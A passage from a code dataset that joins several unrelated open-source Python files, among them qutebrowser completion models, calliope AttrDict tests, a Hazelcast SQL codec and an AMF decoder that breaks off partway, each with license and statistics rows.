@validate(value=val_instance.VaultInstanceRule)
def check_vault(value):
return True
self.assertTrue(check_vault(vault))
with self.assertRaises(errors.InvalidVaultInstance):
check_vault(vault.vault_id)
def test_block_instance(self):
block = api.Block(self.project_id, self.vault_id, self.block[0])
@validate(value=val_instance.BlockInstanceRule)
def check_block(value):
return True
self.assertTrue(check_block(block))
with self.assertRaises(errors.InvalidBlockInstance):
check_block(block.block_id)
def test_file_splitter_instance(self):
reader = make_reader(100, null_data=True)
splitter = UniformSplitter(self.project_id, self.vault_id, reader)
@validate(value=val_instance.FileSplitterInstanceRule)
def check_splitter(value):
return True
self.assertTrue(check_splitter(splitter))
with self.assertRaises(errors.InvalidFileSplitterType):
check_splitter(self.project_id)
| apache-2.0 | -2,824,867,123,911,083,500 | 28.776316 | 74 | 0.680071 | false |
forkbong/qutebrowser | qutebrowser/completion/models/miscmodels.py | 1 | 10499 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2021 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Functions that return miscellaneous completion models."""
import datetime
from typing import List, Sequence, Tuple
from qutebrowser.config import config, configdata
from qutebrowser.utils import objreg, log, utils
from qutebrowser.completion.models import completionmodel, listcategory, util
from qutebrowser.browser import inspector
def command(*, info):
"""A CompletionModel filled with non-hidden commands and descriptions."""
model = completionmodel.CompletionModel(column_widths=(20, 60, 20))
cmdlist = util.get_cmd_completions(info, include_aliases=True,
include_hidden=False)
model.add_category(listcategory.ListCategory("Commands", cmdlist))
return model
def helptopic(*, info):
"""A CompletionModel filled with help topics."""
model = completionmodel.CompletionModel(column_widths=(20, 70, 10))
cmdlist = util.get_cmd_completions(info, include_aliases=False,
include_hidden=True, prefix=':')
settings = ((opt.name, opt.description, info.config.get_str(opt.name))
for opt in configdata.DATA.values())
model.add_category(listcategory.ListCategory("Commands", cmdlist))
model.add_category(listcategory.ListCategory("Settings", settings))
return model
def quickmark(*, info=None):
"""A CompletionModel filled with all quickmarks."""
def delete(data: Sequence[str]) -> None:
"""Delete a quickmark from the completion menu."""
name = data[0]
quickmark_manager = objreg.get('quickmark-manager')
log.completion.debug('Deleting quickmark {}'.format(name))
quickmark_manager.delete(name)
utils.unused(info)
model = completionmodel.CompletionModel(column_widths=(30, 70, 0))
marks = objreg.get('quickmark-manager').marks.items()
model.add_category(listcategory.ListCategory('Quickmarks', marks,
delete_func=delete,
sort=False))
return model
def bookmark(*, info=None):
"""A CompletionModel filled with all bookmarks."""
def delete(data: Sequence[str]) -> None:
"""Delete a bookmark from the completion menu."""
urlstr = data[0]
log.completion.debug('Deleting bookmark {}'.format(urlstr))
bookmark_manager = objreg.get('bookmark-manager')
bookmark_manager.delete(urlstr)
utils.unused(info)
model = completionmodel.CompletionModel(column_widths=(30, 70, 0))
marks = objreg.get('bookmark-manager').marks.items()
model.add_category(listcategory.ListCategory('Bookmarks', marks,
delete_func=delete,
sort=False))
return model
def session(*, info=None):
"""A CompletionModel filled with session names."""
from qutebrowser.misc import sessions
utils.unused(info)
model = completionmodel.CompletionModel()
try:
sess = ((name,) for name
in sessions.session_manager.list_sessions()
if not name.startswith('_'))
model.add_category(listcategory.ListCategory("Sessions", sess))
except OSError:
log.completion.exception("Failed to list sessions!")
return model
def _tabs(*, win_id_filter=lambda _win_id: True, add_win_id=True):
"""Helper to get the completion model for tabs/other_tabs.
Args:
win_id_filter: A filter function for window IDs to include.
Should return True for all included windows.
add_win_id: Whether to add the window ID to the completion items.
"""
def delete_tab(data):
"""Close the selected tab."""
win_id, tab_index = data[0].split('/')
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=int(win_id))
tabbed_browser.on_tab_close_requested(int(tab_index) - 1)
model = completionmodel.CompletionModel(column_widths=(6, 40, 46, 8))
tabs_are_windows = config.val.tabs.tabs_are_windows
# list storing all single-tabbed windows when tabs_are_windows
windows: List[Tuple[str, str, str, str]] = []
for win_id in objreg.window_registry:
if not win_id_filter(win_id):
continue
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=win_id)
if tabbed_browser.is_shutting_down:
continue
tab_entries: List[Tuple[str, str, str, str]] = []
for idx in range(tabbed_browser.widget.count()):
tab = tabbed_browser.widget.widget(idx)
tab_str = ("{}/{}".format(win_id, idx + 1) if add_win_id
else str(idx + 1))
pid = tab.renderer_process_pid()
tab_entries.append((
tab_str,
tab.url().toDisplayString(),
tabbed_browser.widget.page_title(idx),
"" if pid is None else f"PID {pid}",
))
if tabs_are_windows:
windows += tab_entries
else:
title = str(win_id) if add_win_id else "Tabs"
cat = listcategory.ListCategory(
title, tab_entries, delete_func=delete_tab, sort=False)
model.add_category(cat)
if tabs_are_windows:
win = listcategory.ListCategory(
"Windows", windows, delete_func=delete_tab, sort=False)
model.add_category(win)
return model
def tabs(*, info=None):
"""A model to complete on open tabs across all windows.
Used for the tab-select command (and others).
"""
utils.unused(info)
return _tabs()
def other_tabs(*, info):
"""A model to complete on open tabs across all windows except the current.
Used for the tab-take command.
"""
return _tabs(win_id_filter=lambda win_id: win_id != info.win_id)
def tab_focus(*, info):
"""A model to complete on open tabs in the current window."""
model = _tabs(win_id_filter=lambda win_id: win_id == info.win_id,
add_win_id=False)
special = [
("last", "Focus the last-focused tab"),
("stack-next", "Go forward through a stack of focused tabs"),
("stack-prev", "Go backward through a stack of focused tabs"),
]
model.add_category(listcategory.ListCategory("Special", special))
return model
def window(*, info):
"""A model to complete on all open windows."""
model = completionmodel.CompletionModel(column_widths=(6, 30, 64))
windows = []
for win_id in objreg.window_registry:
if win_id == info.win_id:
continue
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=win_id)
tab_titles = (tab.title() for tab in tabbed_browser.widgets())
windows.append(("{}".format(win_id),
objreg.window_registry[win_id].windowTitle(),
", ".join(tab_titles)))
model.add_category(listcategory.ListCategory("Windows", windows))
return model
def inspector_position(*, info):
"""A model for possible inspector positions."""
utils.unused(info)
model = completionmodel.CompletionModel(column_widths=(100, 0, 0))
positions = [(e.name,) for e in inspector.Position]
category = listcategory.ListCategory("Position (optional)", positions)
model.add_category(category)
return model
def _qdatetime_to_completion_format(qdate):
if not qdate.isValid():
ts = 0
else:
ts = qdate.toMSecsSinceEpoch()
if ts < 0:
ts = 0
pydate = datetime.datetime.fromtimestamp(ts / 1000)
return pydate.strftime(config.val.completion.timestamp_format)
def _back_forward(info, go_forward):
history = info.cur_tab.history
current_idx = history.current_idx()
model = completionmodel.CompletionModel(column_widths=(5, 36, 50, 9))
if go_forward:
start = current_idx + 1
items = history.forward_items()
else:
start = 0
items = history.back_items()
entries = [
(
str(idx),
entry.url().toDisplayString(),
entry.title(),
_qdatetime_to_completion_format(entry.lastVisited())
)
for idx, entry in enumerate(items, start)
]
if not go_forward:
# make sure the most recent is at the top for :back
entries.reverse()
cat = listcategory.ListCategory("History", entries, sort=False)
model.add_category(cat)
return model
def forward(*, info):
"""A model to complete on history of the current tab.
Used for the :forward command.
"""
return _back_forward(info, go_forward=True)
def back(*, info):
"""A model to complete on history of the current tab.
Used for the :back command.
"""
return _back_forward(info, go_forward=False)
def undo(*, info):
"""A model to complete undo entries."""
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=info.win_id)
model = completionmodel.CompletionModel(column_widths=(6, 84, 10))
timestamp_format = config.val.completion.timestamp_format
entries = [
(
str(idx),
', '.join(entry.url.toDisplayString() for entry in group),
group[-1].created_at.strftime(timestamp_format)
)
for idx, group in
enumerate(reversed(tabbed_browser.undo_stack), start=1)
]
cat = listcategory.ListCategory("Closed tabs", entries, sort=False)
model.add_category(cat)
return model
| gpl-3.0 | 8,726,302,838,719,023,000 | 33.536184 | 78 | 0.622059 | false |
brynpickering/calliope | calliope/test/test_core_attrdict.py | 1 | 10804 | from io import StringIO
import os
import pytest
import numpy as np
import tempfile
import ruamel.yaml as ruamel_yaml
from calliope.core.attrdict import AttrDict, _MISSING
from calliope.test.common.util import check_error_or_warning
class TestAttrDict:
@pytest.fixture
def regular_dict(self):
d = {'a': 1,
'b': 2,
'c': {'x': 'foo',
'y': 'bar',
'z': {'I': 1,
'II': 2}
},
'd': None
}
return d
setup_string = """
# a comment
a: 1
b: 2
# a comment about `c`
c: # a comment inline with `c`
x: foo # a comment on foo
#
y: bar #
z:
I: 1
II: 2
d:
"""
@pytest.fixture
def yaml_file(self):
return StringIO(self.setup_string)
@pytest.fixture
def yaml_string(self):
return self.setup_string
@pytest.fixture
def attr_dict(self, regular_dict):
d = regular_dict
return AttrDict(d)
def test_missing_nonzero(self):
assert _MISSING is not True
assert _MISSING is not False
assert _MISSING is not None
assert _MISSING.__nonzero__() is False
def test_init_from_nondict(self):
with pytest.raises(ValueError) as excinfo:
d = AttrDict('foo')
assert check_error_or_warning(
excinfo, 'Must pass a dict to AttrDict'
)
def test_init_from_dict(self, regular_dict):
d = AttrDict(regular_dict)
assert d.a == 1
def test_init_from_dict_with_nested_keys(self):
d = AttrDict({'foo.bar.baz': 1})
assert d.foo.bar.baz == 1
def test_from_yaml_fobj(self, yaml_file):
d = AttrDict.from_yaml(yaml_file)
assert d.a == 1
assert d.c.z.II == 2
def test_from_yaml_path(self):
this_path = os.path.dirname(__file__)
yaml_path = os.path.join(this_path, 'common', 'yaml_file.yaml')
d = AttrDict.from_yaml(yaml_path)
assert d.a == 1
assert d.c.z.II == 2
def test_from_yaml_string(self, yaml_string):
d = AttrDict.from_yaml_string(yaml_string)
assert d.a == 1
assert d.c.z.II == 2
def test_from_yaml_string_dot_strings(self):
yaml_string = 'a.b.c: 1\na.b.foo: 2'
d = AttrDict.from_yaml_string(yaml_string)
assert d.a.b.c == 1
assert d.a.b.foo == 2
def test_from_yaml_string_dot_strings_duplicate(self):
yaml_string = 'a.b.c: 1\na.b.c: 2'
with pytest.warns(ruamel_yaml.constructor.DuplicateKeyFutureWarning):
AttrDict.from_yaml_string(yaml_string)
def test_simple_invalid_yaml(self):
yaml_string = '1 this is not valid yaml'
with pytest.raises(ValueError) as excinfo:
AttrDict.from_yaml_string(yaml_string)
assert check_error_or_warning(
excinfo, 'Could not parse <yaml string> as YAML'
)
def test_parser_error(self):
with pytest.raises(ruamel_yaml.YAMLError):
AttrDict.from_yaml_string("""
foo: bar
baz: 1
- foobar
bar: baz
""")
def test_dot_access_first(self, attr_dict):
d = attr_dict
assert d.a == 1
def test_dot_access_second(self, attr_dict):
d = attr_dict
assert d.c.x == 'foo'
def test_dot_access_list(self):
d = AttrDict.from_yaml_string("a: [{x: 1}, {y: 2}]")
assert d.a[0].x == 1
def test_set_key_first(self, attr_dict):
d = attr_dict
d.set_key('a', 2)
assert d.a == 2
def test_set_key_second(self, attr_dict):
d = attr_dict
d.set_key('c.x', 'baz')
assert d.c.x == 'baz'
def test_set_key_multiple_inexisting(self, attr_dict):
d = attr_dict
d.set_key('c.l.o.h.a', 'foo')
assert d.c.l.o.h.a == 'foo'
def test_set_key_nested_on_string(self, attr_dict):
d = attr_dict
with pytest.raises(KeyError):
d.set_key('a.foo', 'bar')
def test_set_key_nested_on_none(self, attr_dict):
d = attr_dict
assert d['d'] is None
d.set_key('d.foo', 'bar')
assert d.d.foo == 'bar'
def test_pass_regular_dict_to_set_key(self, attr_dict):
# Regular dicts get turned into AttrDicts when using
# assignment through set_key()
attr_dict.set_key('c.z.newkey', {'foo': 1, 'doo': 2})
assert isinstance(attr_dict.get_key('c.z.newkey'), AttrDict)
assert attr_dict.get_key('c.z.newkey.foo') == 1
def test_get_subkey_from_nested_non_attrdict(self, attr_dict):
# Directly assigning a dict means it is not modified
# but it breaks get_key with nested keys
attr_dict['c']['z']['newkey'] = {'foo': 1, 'doo': 2}
with pytest.raises(AttributeError) as excinfo:
attr_dict.get_key('c.z.newkey.foo')
assert check_error_or_warning(
excinfo, "'dict' object has no attribute 'get_key'"
)
def test_get_key_first(self, attr_dict):
d = attr_dict
assert d.get_key('a') == 1
def test_get_key_second(self, attr_dict):
d = attr_dict
assert d.get_key('c.x') == 'foo'
def test_get_key_inexistant(self, attr_dict):
d = attr_dict
with pytest.raises(KeyError):
d.get_key('foo')
def test_get_key_second_inexistant(self, attr_dict):
d = attr_dict
with pytest.raises(KeyError):
d.get_key('foo.bar')
def test_get_key_default(self, attr_dict):
d = attr_dict
assert d.get_key('c.x', default='bar') == 'foo'
def test_get_key_inexistant_default(self, attr_dict):
d = attr_dict
assert d.get_key('foo', default='baz') == 'baz'
def test_get_key_second_inexistant_default(self, attr_dict):
d = attr_dict
assert d.get_key('foo.bar', default='baz') == 'baz'
def test_get_key_second_nondict_default(self, attr_dict):
d = attr_dict
assert d.get_key('c.x.foo', default='baz') == 'baz'
def test_get_key_inexistant_default_false(self, attr_dict):
d = attr_dict
assert d.get_key('foo', default=False) is False
def test_get_key_second_inexistant_default_false(self, attr_dict):
d = attr_dict
assert d.get_key('foo.bar', default=False) is False
def test_as_dict(self, attr_dict):
d = attr_dict
dd = d.as_dict()
assert dd['a'] == 1
assert dd['c']['x'] == 'foo'
def test_as_dict_with_sublists(self):
d = AttrDict.from_yaml_string("a: [{x: 1}, {y: 2}]")
dd = d.as_dict()
assert dd['a'][0]['x'] == 1
assert isinstance(dd['a'][0], dict) # Not AttrDict!
def test_as_dict_flat(self, attr_dict):
dd = attr_dict.as_dict(flat=True)
assert dd['c.x'] == 'foo'
def test_keys_nested_as_list(self, attr_dict):
d = attr_dict
dd = d.keys_nested()
assert dd == ['a', 'b', 'c.x', 'c.y', 'c.z.I', 'c.z.II', 'd']
def test_keys_nested_as_dict(self, attr_dict):
d = attr_dict
dd = d.keys_nested(subkeys_as='dict')
assert dd == ['a', 'b', {'c': ['x', 'y', {'z': ['I', 'II']}]}, 'd']
def test_union(self, attr_dict):
d = attr_dict
d_new = AttrDict()
d_new.set_key('c.z.III', 'foo')
d.union(d_new)
assert d.c.z.III == 'foo'
assert d.c.z.I == 1
def test_union_duplicate_keys(self, attr_dict):
d = attr_dict
d_new = AttrDict()
d_new.set_key('c.z.II', 'foo')
with pytest.raises(KeyError):
d.union(d_new)
def test_union_replacement(self, attr_dict):
d = attr_dict
d_new = AttrDict.from_yaml_string("""
c: {_REPLACE_: foo}
""")
d.union(d_new, allow_override=True, allow_replacement=True)
assert d.c == 'foo'
def test_union_empty_dicts(self, attr_dict):
d = attr_dict
d_new = AttrDict({
'1': {'foo': {}},
'baz': {'bar': {}},
})
d.union(d_new)
assert len(d.baz.bar.keys()) == 0
def test_del_key_single(self, attr_dict):
attr_dict.del_key('c')
assert 'c' not in attr_dict
def test_del_key_nested(self, attr_dict):
attr_dict.del_key('c.z.I')
assert 'I' not in attr_dict.c.z
def test_to_yaml(self, yaml_file):
d = AttrDict.from_yaml(yaml_file)
d.set_key('numpy.some_int', np.int32(10))
d.set_key('numpy.some_float', np.float64(0.5))
d.a_list = [0, 1, 2]
with tempfile.TemporaryDirectory() as tempdir:
out_file = os.path.join(tempdir, 'test.yaml')
d.to_yaml(out_file)
with open(out_file, 'r') as f:
result = f.read()
assert 'some_int: 10' in result
assert 'some_float: 0.5' in result
assert 'a_list:\n- 0\n- 1\n- 2' in result
def test_to_yaml_string(self, yaml_file):
d = AttrDict.from_yaml(yaml_file)
result = d.to_yaml()
assert 'a: 1' in result
def test_import_must_be_list(self):
yaml_string = """
import: 'somefile.yaml'
"""
with pytest.raises(ValueError) as excinfo:
AttrDict.from_yaml_string(yaml_string, resolve_imports=True)
assert check_error_or_warning(
excinfo, '`import` must be a list.')
def test_do_not_resolve_imports(self):
yaml_string = """
import: ['somefile.yaml']
"""
d = AttrDict.from_yaml_string(yaml_string, resolve_imports=False)
# Should not raise an error about a missing file, as we ask for
# imports not to be resolved
assert d['import'] == ['somefile.yaml']
def test_nested_import(self, yaml_file):
with tempfile.TemporaryDirectory() as tempdir:
imported_file = os.path.join(tempdir, 'test_import.yaml')
imported_yaml = """
somekey: 1
anotherkey: 2
"""
with open(imported_file, 'w') as f:
f.write(imported_yaml)
yaml_string = """
foobar:
import:
- {}
foo:
bar: 1
baz: 2
3:
4: 5
""".format(imported_file)
d = AttrDict.from_yaml_string(
yaml_string, resolve_imports='foobar'
)
assert 'foobar.somekey' in d.keys_nested()
assert d.get_key('foobar.anotherkey') == 2
| apache-2.0 | 3,015,041,769,618,771,500 | 29.606232 | 77 | 0.530452 | false |
stanzikratel/barbican-2 | barbican/model/migration/alembic_migrations/env.py | 1 | 2942 | # Copyright (c) 2013-2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
from alembic import context
from sqlalchemy import create_engine, pool
from barbican.model import models
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
# Note that the 'config' instance is not available in for unit testing.
try:
config = context.config
except Exception:
config = None
# WARNING! The following was autogenerated by Alembic as part of setting up
# the initial environment. Unfortunately it also **clobbers** the logging
# for the rest of this applicaton, so please do not use it!
# Interpret the config file for Python logging.
# This line sets up loggers basically.
#fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = models.BASE.metadata
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def get_sqlalchemy_url():
return config.barbican_sqlalchemy_url or config \
.get_main_option("sqlalchemy.url")
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
context.configure(url=get_sqlalchemy_url())
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
engine = create_engine(
get_sqlalchemy_url(),
poolclass=pool.NullPool)
connection = engine.connect()
context.configure(
connection=connection,
target_metadata=target_metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if config:
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| apache-2.0 | 4,279,292,624,011,151,400 | 28.42 | 75 | 0.711421 | false |
sjjhsjjh/blender-driver | diagnostic/analysis.py | 1 | 3137 | #!/usr/bin/python
# (c) 2018 Jim Hawkins. MIT licensed, see https://opensource.org/licenses/MIT
# Part of Blender Driver, see https://github.com/sjjhsjjh/blender-driver
"""Python module for the Blender Driver diagnostic.
This module contains analytical utilities that are used in some diagnostic and
demonstration Blender Driver applications."""
# Standard library imports, in alphabetic order.
#
# Module for column widths.
# https://docs.python.org/3/library/math.html
from math import log10
def timing_analysis_dump(times):
return "\n".join(timing_analysis(times))
def timing_analysis(times, timePrecision=4):
analyses = []
indexWidth = index_width(times)
timeWidth = field_width(times, precision=timePrecision)
lastTime = None
for index, time in enumerate(times):
indexStr = '{:{indexWidth}d} '.format(index, indexWidth=indexWidth)
timeStr = 'None'
analysis = ""
if time is not None:
timeStr = '{:{timeWidth}.{timePrecision}f}'.format(
time, timeWidth=timeWidth, timePrecision=timePrecision)
if lastTime is not None:
elapsed = time - lastTime
analysis = ' {:.{timePrecision}f} 1/{:.0f}'.format(
elapsed, 0.0 if elapsed <= 0 else 1.0 / elapsed
, timePrecision=timePrecision)
lastTime = time
analyses.append(''.join((indexStr, timeStr, analysis)))
return analyses
def index_width(lenable):
return len("{:d}".format(len(lenable)- 1))
def field_width(values, precision=4, type="f"):
width = None
for value in values:
if value is None:
continue
str = '{:.{precision}{type}}'.format(
value, precision=precision, type=type)
if width is None or len(str) > width:
width = len(str)
return width
def timing_summary(times, totalLabel="total", otherLabel="run"
, noneLabel="skipped"
):
nones = times.count(None)
others = len(times) - nones
return '{}:{:d} {}:{:d}({:.0%}) {}:{:d}({:.0%})'.format(
totalLabel, len(times)
, otherLabel, others, float(others) / float(len(times))
, noneLabel, nones, float(nones) / float(len(times)))
def fall_analysis(positionsTimes):
analyses = []
lastPosition = None
falls = 0
indexWidth = index_width(positionsTimes)
for index, positionTime in enumerate(positionsTimes):
position, time = positionTime
if lastPosition == position:
fall = " ="
else:
fall = ""
falls += 1
lastPosition = position
analyses.append('{:{indexWidth}d} {:.2f} {:.4f}{}'.format(
index, position, time, fall, indexWidth=indexWidth))
return len(analyses) - falls, "\n".join(analyses)
if __name__ == '__main__':
print(__doc__)
times = [0.0, 1.0, None, 2.5, 2.55, 10.0, 10.1, 10.3, 10.5, 10.7, 10.8]
print("\nTest", times)
print(timing_analysis_dump(times))
print(timing_summary(times))
print(timing_analysis_dump([]))
raise SystemExit(1)
| mit | -3,456,444,688,188,179,500 | 34.247191 | 78 | 0.603762 | false |
jollychang/robotframework-appiumlibrary | AppiumLibrary/keywords/_logging.py | 1 | 1979 | # -*- coding: utf-8 -*-
import os
from robot.libraries.BuiltIn import BuiltIn
from robot.libraries.BuiltIn import RobotNotRunningError
from robot.api import logger
from .keywordgroup import KeywordGroup
class _LoggingKeywords(KeywordGroup):
LOG_LEVEL_DEBUG = ['DEBUG']
LOG_LEVEL_INFO = ['DEBUG', 'INFO']
LOG_LEVEL_WARN = ['DEBUG', 'INFO', 'WARN']
@property
def _log_level(self):
try:
level = BuiltIn().get_variable_value("${APPIUM_LOG_LEVEL}", default='DEBUG')
except RobotNotRunningError:
level = 'DEBUG'
return level
def _debug(self, message):
if self._log_level in self.LOG_LEVEL_DEBUG:
logger.debug(message)
def _info(self, message):
if self._log_level in self.LOG_LEVEL_INFO:
logger.info(message)
def _warn(self, message):
if self._log_level in self.LOG_LEVEL_WARN:
logger.warn(message)
def _html(self, message):
if self._log_level in self.LOG_LEVEL_INFO:
logger.info(message, True, False)
def _get_log_dir(self):
variables = BuiltIn().get_variables()
logfile = variables['${LOG FILE}']
if logfile != 'NONE':
return os.path.dirname(logfile)
return variables['${OUTPUTDIR}']
def _log(self, message, level='INFO'):
level = level.upper()
if (level == 'INFO'):
self._info(message)
elif (level == 'DEBUG'):
self._debug(message)
elif (level == 'WARN'):
self._warn(message)
elif (level == 'HTML'):
self._html(message)
def _log_list(self, items, what='item'):
msg = ['Altogether %d %s%s.' % (len(items), what, ['s', ''][len(items) == 1])]
for index, item in enumerate(items):
msg.append('%d: %s' % (index+1, item))
self._info('\n'.join(msg))
return items
| apache-2.0 | 3,333,785,420,948,168,700 | 29.412698 | 88 | 0.551794 | false |
hazelcast/hazelcast-python-client | hazelcast/protocol/codec/sql_execute_codec.py | 1 | 2438 | from hazelcast.serialization.bits import *
from hazelcast.protocol.builtin import FixSizedTypesCodec
from hazelcast.protocol.client_message import OutboundMessage, REQUEST_HEADER_SIZE, create_initial_buffer, RESPONSE_HEADER_SIZE
from hazelcast.protocol.builtin import StringCodec
from hazelcast.protocol.builtin import ListMultiFrameCodec
from hazelcast.protocol.builtin import DataCodec
from hazelcast.protocol.builtin import CodecUtil
from hazelcast.protocol.codec.custom.sql_query_id_codec import SqlQueryIdCodec
from hazelcast.protocol.codec.custom.sql_column_metadata_codec import SqlColumnMetadataCodec
from hazelcast.protocol.builtin import SqlPageCodec
from hazelcast.protocol.codec.custom.sql_error_codec import SqlErrorCodec
# hex: 0x210400
_REQUEST_MESSAGE_TYPE = 2163712
# hex: 0x210401
_RESPONSE_MESSAGE_TYPE = 2163713
_REQUEST_TIMEOUT_MILLIS_OFFSET = REQUEST_HEADER_SIZE
_REQUEST_CURSOR_BUFFER_SIZE_OFFSET = _REQUEST_TIMEOUT_MILLIS_OFFSET + LONG_SIZE_IN_BYTES
_REQUEST_EXPECTED_RESULT_TYPE_OFFSET = _REQUEST_CURSOR_BUFFER_SIZE_OFFSET + INT_SIZE_IN_BYTES
_REQUEST_INITIAL_FRAME_SIZE = _REQUEST_EXPECTED_RESULT_TYPE_OFFSET + BYTE_SIZE_IN_BYTES
_RESPONSE_UPDATE_COUNT_OFFSET = RESPONSE_HEADER_SIZE
def encode_request(sql, parameters, timeout_millis, cursor_buffer_size, schema, expected_result_type, query_id):
buf = create_initial_buffer(_REQUEST_INITIAL_FRAME_SIZE, _REQUEST_MESSAGE_TYPE)
FixSizedTypesCodec.encode_long(buf, _REQUEST_TIMEOUT_MILLIS_OFFSET, timeout_millis)
FixSizedTypesCodec.encode_int(buf, _REQUEST_CURSOR_BUFFER_SIZE_OFFSET, cursor_buffer_size)
FixSizedTypesCodec.encode_byte(buf, _REQUEST_EXPECTED_RESULT_TYPE_OFFSET, expected_result_type)
StringCodec.encode(buf, sql)
ListMultiFrameCodec.encode_contains_nullable(buf, parameters, DataCodec.encode)
CodecUtil.encode_nullable(buf, schema, StringCodec.encode)
SqlQueryIdCodec.encode(buf, query_id, True)
return OutboundMessage(buf, False)
def decode_response(msg):
initial_frame = msg.next_frame()
response = dict()
response["update_count"] = FixSizedTypesCodec.decode_long(initial_frame.buf, _RESPONSE_UPDATE_COUNT_OFFSET)
response["row_metadata"] = ListMultiFrameCodec.decode_nullable(msg, SqlColumnMetadataCodec.decode)
response["row_page"] = CodecUtil.decode_nullable(msg, SqlPageCodec.decode)
response["error"] = CodecUtil.decode_nullable(msg, SqlErrorCodec.decode)
return response
| apache-2.0 | 9,091,394,537,390,006,000 | 54.409091 | 127 | 0.800656 | false |
tailhook/amfy | amfy/core.py | 1 | 15667 | from io import BytesIO
import struct
import datetime, time
from collections import OrderedDict
from weakref import WeakKeyDictionary as weakdict
class Undefined(object):
__slots__ = ()
def __new__(cls):
return undefined
def __eq__(self, other):
return self is other
def __neq__(self, other):
return self is not other
undefined = object().__new__(Undefined)
class Loader(object):
def add_alias(self, alias, constructor):
raise NotImplementedError()
def load(self, stream, proto=0, context=None):
# please keep it reentrant
if context is None:
context = ReadContext()
if proto == 0:
return self._read_item0(stream, context)
elif proto == 3:
return self._read_item3(stream, context)
else:
raise ValueError(proto)
def loads(self, value, proto=0):
return self.load(BytesIO(value), proto)
def load_all(self, stream, proto=0):
context = Context()
try:
while True:
yield self.load(stream, proto, context)
except EOFError:
return
def loads_all(self, value, proto=0):
return self.load_all(BytesIO(value), proto)
def _read_item3(self, stream, context):
marker = stream.read(1)[0]
if marker == 0x00:
return undefined
elif marker == 0x01:
return None
elif marker == 0x02:
return False
elif marker == 0x03:
return True
elif marker == 0x04:
return self._read_vli(stream)
elif marker == 0x05:
return struct.unpack('!d', stream.read(8))[0]
elif marker == 0x06:
return self._read_string3(stream, context)
elif marker == 0x07:
raise NotImplementedError("XML Document")
elif marker == 0x08:
num = self._read_vli(stream)
if num & 1:
res = datetime.datetime.utcfromtimestamp(
struct.unpack('!d', stream.read(8))[0]/1000)
context.add_object(res)
else:
res = context.get_object(num >> 1)
return res
elif marker == 0x09:
num = self._read_vli(stream)
if num & 1:
res = None
while True:
val = self._read_string3(stream, context)
if val == '':
if res is None:
res = [None]*(num >> 1)
context.add_object(res)
break
elif res is None:
res = OrderedDict()
context.add_object(res)
res[val] = self._read_item3(stream, context)
for i in range(num >> 1):
res[i] = self._read_item3(stream, context)
else:
res = context.get_object(num >> 1)
return res
elif marker == 0x0A:
num = self._read_vli(stream)
if num & 1:
if num & 2:
if num & 4: # traits-ext
trait = Trait()
raise NotImplementedError('Traits ext')
else: # traits
dyn = bool(num & 8)
memb = num >> 4
trait = Trait(dyn,
self._read_string3(stream, context),
(self._read_string3(stream, context)
for i in range(memb)))
context.add_trait(trait)
else: # traits-ref
trait = context.get_trait(num >> 2)
else:
return context.get_object(num >> 1)
if trait.members:
raise NotImplementedError("Trait members")
if not trait.dynamic:
raise NotImplementedError("Dynamic trait")
res = {}
while True:
key = self._read_string3(stream, context)
if key == "":
break
value = self._read_item3(stream, context)
res[key] = value
return res
elif marker == 0x0B:
# xml
raise NotImplementedError()
elif marker == 0x0C:
num = self._read_vli(stream)
if num & 1:
res = stream.read(num >> 1)
context.add_object(res)
else:
res = context.get_object(num >> 1)
return res
else:
raise NotImplementedError("Marker 0x{:02x}".format(marker))
def _read_vli(self, stream):
val = 0
while True:
byte = stream.read(1)[0]
val = (val << 7) | (byte & 0x7f)
if not (byte & 0x80):
break
return val
def _read_string3(self, stream, context):
num = self._read_vli(stream)
if num & 1:
num >>= 1
if num:
res = stream.read(num).decode('utf-8')
context.add_string(res)
return res
else:
return ''
else:
num >>= 1
return context.get_string(num)
def _read_string0(self, stream):
len = struct.unpack('!H', stream.read(2))[0]
return stream.read(len).decode('utf-8')
def _read_item0(self, stream, context):
marker = stream.read(1)
if marker:
marker = marker[0]
else:
raise EOFError()
if marker == 0x00:
return struct.unpack('!d', stream.read(8))[0]
elif marker == 0x01:
return bool(stream.read(1)[0])
elif marker == 0x02:
return self._read_string0(stream)
elif marker == 0x03:
res = {}
context.add_complex(res)
while True:
key = self._read_string0(stream)
if key == '':
break
res[key] = self._read_item0(stream, context)
end = stream.read(1)[0]
assert end == 0x09
return res
elif marker == 0x05: # null
return None
elif marker == 0x06: # undefined
return undefined
elif marker == 0x07: # ref
idx = struct.unpack('!H', stream.read(2))[0]
return context.get_complex(idx)
elif marker == 0x08: # assoc arr
